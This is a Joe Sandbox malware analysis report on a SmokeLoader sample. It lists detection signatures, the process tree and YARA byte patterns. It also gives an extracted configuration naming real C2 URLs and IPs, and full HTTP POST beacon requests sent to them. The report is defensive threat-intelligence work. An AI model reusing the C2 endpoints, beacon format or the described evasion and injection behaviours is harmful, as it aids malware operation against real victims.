Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RmbF3635xY.exe

Overview

General Information

Sample name:RmbF3635xY.exe
renamed because original name is a hash value
Original sample name:f488b4eb65d5f5339401fc0869e614433719e64a5156945b530f98c7d39452e1.exe
Analysis ID:1525800
MD5:31059e7394b880f017e83804d9b716ab
SHA1:2c0057c276d7d2020d1e5a60ca6d44e2fb91674e
SHA256:f488b4eb65d5f5339401fc0869e614433719e64a5156945b530f98c7d39452e1
Tags:bestmagazineforanimalsunicum-ruexeuser-JAMESWT_MHT
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RmbF3635xY.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\RmbF3635xY.exe" MD5: 31059E7394B880F017E83804D9B716AB)
    • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • jtruajj (PID: 4284 cmdline: C:\Users\user\AppData\Roaming\jtruajj MD5: 31059E7394B880F017E83804D9B716AB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x654:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x254:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      Click to see the 11 entries

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Execution of Suspicious File Type Extension
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\jtruajj, CommandLine: C:\Users\user\AppData\Roaming\jtruajj, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jtruajj, NewProcessName: C:\Users\user\AppData\Roaming\jtruajj, OriginalFileName: C:\Users\user\AppData\Roaming\jtruajj, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Users\user\AppData\Roaming\jtruajj, ProcessId: 4284, ProcessName: jtruajj

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-04T15:10:05.191461+020020391031A Network Trojan was detected192.168.2.949710193.46.217.7880TCP
      2024-10-04T15:10:06.535004+020020391031A Network Trojan was detected192.168.2.949711188.40.141.21180TCP
      2024-10-04T15:10:06.922982+020020391031A Network Trojan was detected192.168.2.949711188.40.141.21180TCP
      2024-10-04T15:10:32.226080+020020391031A Network Trojan was detected192.168.2.949713193.46.217.7880TCP
      2024-10-04T15:10:32.432388+020020391031A Network Trojan was detected192.168.2.949711188.40.141.21180TCP
      2024-10-04T15:10:32.829421+020020391031A Network Trojan was detected192.168.2.949711188.40.141.21180TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: RmbF3635xY.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Roaming\jtruajjAvira: detection malicious, Label: HEUR/AGEN.1312567
      Found malware configuration
      Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\jtruajjReversingLabs: Detection: 81%
      Multi AV Scanner detection for submitted file
      Source: RmbF3635xY.exeReversingLabs: Detection: 81%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\jtruajjJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: RmbF3635xY.exeJoe Sandbox ML: detected
      Source: RmbF3635xY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\RmbF3635xY.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49710 -> 193.46.217.78:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49711 -> 188.40.141.211:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49713 -> 193.46.217.78:80
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 193.46.217.78 80Jump to behavior
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: http://unicexpertmagazine.pw/index.php
      Source: Malware configuration extractorURLs: http://ceoconstractionstore.pl/index.php
      Source: Malware configuration extractorURLs: http://openclehardware.ru/index.php
      Source: Malware configuration extractorURLs: http://informcoopirationunicolceo.ru/index.php
      Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
      Source: Joe Sandbox ViewASN Name: CUBENODEES CUBENODEES
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gtatfotvrgw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: unicexpertmagazine.pw
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://duiiukhvfawcnf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: ceoconstractionstore.pl
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://trpngknppeg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: ceoconstractionstore.pl
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xtihbxaqoab.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: unicexpertmagazine.pw
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rljealjxpbaxswq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: ceoconstractionstore.pl
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qburaxgwiulsnc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: ceoconstractionstore.pl
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: unicexpertmagazine.pw
      Source: global trafficDNS traffic detected: DNS query: ceoconstractionstore.pl
      Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gtatfotvrgw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: unicexpertmagazine.pw
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 04 Oct 2024 13:10:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 13:10:06 GMTData Raw: 03 00 00 00 7d 4f d6 Data Ascii: }O
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 13:10:06 GMT
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 04 Oct 2024 13:10:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 13:10:32 GMTData Raw: 03 00 00 00 7d 4f d6 Data Ascii: }O
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Fri, 04 Oct 2024 13:10:32 GMT
      Source: explorer.exe, 00000002.00000002.2717195196.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000002.00000003.2291027999.000000000BEC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2725388565.0000000010390000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2725441570.0000000010460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ceoconstractionstore.pl/index.php
      Source: explorer.exe, 00000002.00000002.2717195196.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000002.00000002.2717195196.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000002.00000002.2717195196.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1573369849.00000000087BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000002.00000003.2292625257.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2721431889.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qburaxgwiulsnc.com/
      Source: explorer.exe, 00000002.00000003.2292625257.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2721431889.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qburaxgwiulsnc.com/l
      Source: explorer.exe, 00000002.00000000.1573131905.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2716113298.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1570267826.0000000002C60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000002.00000000.1573255731.00000000085D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2292146114.00000000085E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000002.00000003.2292625257.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2721431889.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
      Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSJM
      Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSZM
      Source: explorer.exe, 00000002.00000002.2722215051.000000000BE19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1575532214.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291599189.000000000BE16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2291027999.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSp
      Source: explorer.exe, 00000002.00000000.1573369849.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/rT
      Source: explorer.exe, 00000002.00000000.1573369849.000000000862F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
      Source: explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
      Source: explorer.exe, 00000002.00000000.1573369849.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/~T
      Source: explorer.exe, 00000002.00000000.1570427978.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2713649615.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000002.00000000.1573369849.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2717195196.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
      Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
      Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
      Source: explorer.exe, 00000002.00000000.1571485581.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2714876298.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2293060361.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
